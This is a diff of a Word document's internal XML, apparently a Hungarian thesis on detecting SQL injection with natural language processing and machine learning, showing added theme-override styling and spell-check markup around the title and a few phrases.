+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:wall>
+</cs:chartStyle>
+</file>
+
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
 <a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office-téma">
   <a:themeElements>
@@ -25276,6 +27505,578 @@
 </a:theme>
 </file>
 
+<file path=word/theme/themeOverride1.xml><?xml version="1.0" encoding="utf-8"?>
+<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+  <a:clrScheme name="Office">
+    <a:dk1>
+      <a:sysClr val="windowText" lastClr="000000"/>
+    </a:dk1>
+    <a:lt1>
+      <a:sysClr val="window" lastClr="FFFFFF"/>
+    </a:lt1>
+    <a:dk2>
+      <a:srgbClr val="44546A"/>
+    </a:dk2>
+    <a:lt2>
+      <a:srgbClr val="E7E6E6"/>
+    </a:lt2>
+    <a:accent1>
+      <a:srgbClr val="4472C4"/>
+    </a:accent1>
+    <a:accent2>
+      <a:srgbClr val="ED7D31"/>
+    </a:accent2>
+    <a:accent3>
+      <a:srgbClr val="A5A5A5"/>
+    </a:accent3>
+    <a:accent4>
+      <a:srgbClr val="FFC000"/>
+    </a:accent4>
+    <a:accent5>
+      <a:srgbClr val="5B9BD5"/>
+    </a:accent5>
+    <a:accent6>
+      <a:srgbClr val="70AD47"/>
+    </a:accent6>
+    <a:hlink>
+      <a:srgbClr val="0563C1"/>
+    </a:hlink>
+    <a:folHlink>
+      <a:srgbClr val="954F72"/>
+    </a:folHlink>
+  </a:clrScheme>
+  <a:fontScheme name="Office">
+    <a:majorFont>
+      <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック Light"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线 Light"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Times New Roman"/>
+      <a:font script="Hebr" typeface="Times New Roman"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="MoolBoran"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Times New Roman"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:majorFont>
+    <a:minorFont>
+      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Arial"/>
+      <a:font script="Hebr" typeface="Arial"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="DaunPenh"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Arial"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:minorFont>
+  </a:fontScheme>
+  <a:fmtScheme name="Office">
+    <a:fillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="110000"/>
+              <a:satMod val="105000"/>
+              <a:tint val="67000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="103000"/>
+              <a:tint val="73000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="109000"/>
+              <a:tint val="81000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:satMod val="103000"/>
+              <a:lumMod val="102000"/>
+              <a:tint val="94000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:satMod val="110000"/>
+              <a:lumMod val="100000"/>
+              <a:shade val="100000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="99000"/>
+              <a:satMod val="120000"/>
+              <a:shade val="78000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:fillStyleLst>
+    <a:lnStyleLst>
+      <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+    </a:lnStyleLst>
+    <a:effectStyleLst>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst>
+          <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+            <a:srgbClr val="000000">
+              <a:alpha val="63000"/>
+            </a:srgbClr>
+          </a:outerShdw>
+        </a:effectLst>
+      </a:effectStyle>
+    </a:effectStyleLst>
+    <a:bgFillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:solidFill>
+        <a:schemeClr val="phClr">
+          <a:tint val="95000"/>
+          <a:satMod val="170000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:tint val="93000"/>
+              <a:satMod val="150000"/>
+              <a:shade val="98000"/>
+              <a:lumMod val="102000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:tint val="98000"/>
+              <a:satMod val="130000"/>
+              <a:shade val="90000"/>
+              <a:lumMod val="103000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:shade val="63000"/>
+              <a:satMod val="120000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:bgFillStyleLst>
+  </a:fmtScheme>
+</a:themeOverride>
+</file>
+
+<file path=word/theme/themeOverride2.xml><?xml version="1.0" encoding="utf-8"?>
+<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+  <a:clrScheme name="Office">
+    <a:dk1>
+      <a:sysClr val="windowText" lastClr="000000"/>
+    </a:dk1>
+    <a:lt1>
+      <a:sysClr val="window" lastClr="FFFFFF"/>
+    </a:lt1>
+    <a:dk2>
+      <a:srgbClr val="44546A"/>
+    </a:dk2>
+    <a:lt2>
+      <a:srgbClr val="E7E6E6"/>
+    </a:lt2>
+    <a:accent1>
+      <a:srgbClr val="4472C4"/>
+    </a:accent1>
+    <a:accent2>
+      <a:srgbClr val="ED7D31"/>
+    </a:accent2>
+    <a:accent3>
+      <a:srgbClr val="A5A5A5"/>
+    </a:accent3>
+    <a:accent4>
+      <a:srgbClr val="FFC000"/>
+    </a:accent4>
+    <a:accent5>
+      <a:srgbClr val="5B9BD5"/>
+    </a:accent5>
+    <a:accent6>
+      <a:srgbClr val="70AD47"/>
+    </a:accent6>
+    <a:hlink>
+      <a:srgbClr val="0563C1"/>
+    </a:hlink>
+    <a:folHlink>
+      <a:srgbClr val="954F72"/>
+    </a:folHlink>
+  </a:clrScheme>
+  <a:fontScheme name="Office">
+    <a:majorFont>
+      <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック Light"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线 Light"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Times New Roman"/>
+      <a:font script="Hebr" typeface="Times New Roman"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="MoolBoran"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Times New Roman"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:majorFont>
+    <a:minorFont>
+      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Arial"/>
+      <a:font script="Hebr" typeface="Arial"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="DaunPenh"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Arial"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:minorFont>
+  </a:fontScheme>
+  <a:fmtScheme name="Office">
+    <a:fillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="110000"/>
+              <a:satMod val="105000"/>
+              <a:tint val="67000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="103000"/>
+              <a:tint val="73000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="109000"/>
+              <a:tint val="81000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:satMod val="103000"/>
+              <a:lumMod val="102000"/>
+              <a:tint val="94000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:satMod val="110000"/>
+              <a:lumMod val="100000"/>
+              <a:shade val="100000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="99000"/>
+              <a:satMod val="120000"/>
+              <a:shade val="78000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:fillStyleLst>
+    <a:lnStyleLst>
+      <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+    </a:lnStyleLst>
+    <a:effectStyleLst>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst>
+          <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+            <a:srgbClr val="000000">
+              <a:alpha val="63000"/>
+            </a:srgbClr>
+          </a:outerShdw>
+        </a:effectLst>
+      </a:effectStyle>
+    </a:effectStyleLst>
+    <a:bgFillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:solidFill>
+        <a:schemeClr val="phClr">
+          <a:tint val="95000"/>
+          <a:satMod val="170000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:tint val="93000"/>
+              <a:satMod val="150000"/>
+              <a:shade val="98000"/>
+              <a:lumMod val="102000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:tint val="98000"/>
+              <a:satMod val="130000"/>
+              <a:shade val="90000"/>
+              <a:lumMod val="103000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:shade val="63000"/>
+              <a:satMod val="120000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:bgFillStyleLst>
+  </a:fmtScheme>
+</a:themeOverride>
+</file>
+
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,8 +154,174 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>using</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>natural</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>language</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>processing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>systems</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>learning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -881,15 +1047,33 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy kód SQL injection</w:t>
-      </w:r>
+        <w:t xml:space="preserve">egy kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">beli </w:t>
+        <w:t>injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>beli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1029,8 +1213,36 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Visual Studio Code</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Visual </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Studio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1388,8 +1600,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> train/test készlet,</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1398,8 +1611,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>train</w:t>
